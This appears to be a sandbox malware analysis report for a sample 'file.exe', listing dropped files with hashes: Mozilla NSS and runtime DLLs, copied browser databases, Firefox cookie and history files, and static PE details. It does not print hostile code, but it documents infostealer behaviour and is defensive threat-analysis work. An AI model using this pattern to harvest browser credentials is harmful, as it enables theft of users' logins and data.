Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFHDAKJKFCFBGCBGDHCBAFCAKE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AKFHCAKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFCFBFBFBKFIDHJKFCAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\FIJECAEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJDHDAECBGCAKEBAEBAAKKKFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJJECFIECBGDGCAAAEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDHJKKFBAEGDGDGCBKECBGCGCF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: ND2WP0Fip7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: C5u5BZq8gj.exe, Detection: malicious, Browse Filename: hD2EOjfpfW.exe, Detection: malicious, Browse Filename: AVSicb6epR.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: ND2WP0Fip7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: C5u5BZq8gj.exe, Detection: malicious, Browse Filename: hD2EOjfpfW.exe, Detection: malicious, Browse Filename: AVSicb6epR.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948691464576238
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'837'056 bytes
MD5:	c582a9038fe13bfcf8c7f11db6a6877a
SHA1:	50ad639757744808ab570da6229ddfe1cd4ed432
SHA256:	a4df7d0b5f032022d53e71a0935fe2035eb79c12cef9237a1cd8a2b583f3849e
SHA512:	45ec2fcf346b6c83007380343a1823fe5dbc9e2b3d1550ade885db2cd7736673775a1dbbaf9a9ef7d13ea1bbd364be4a2139fd52050a93dedb4a018dcc5fc3af
SSDEEP:	49152:PuPHhJHGUZtE2Ltou823eqWOE27+uC/7h:PQBhXZxfQX2zA
TLSH:	EF8533FF9A7428A1DA0CE573C3A79AC239B0B52D05DD28753355133AF923BDA3883255
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa95000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
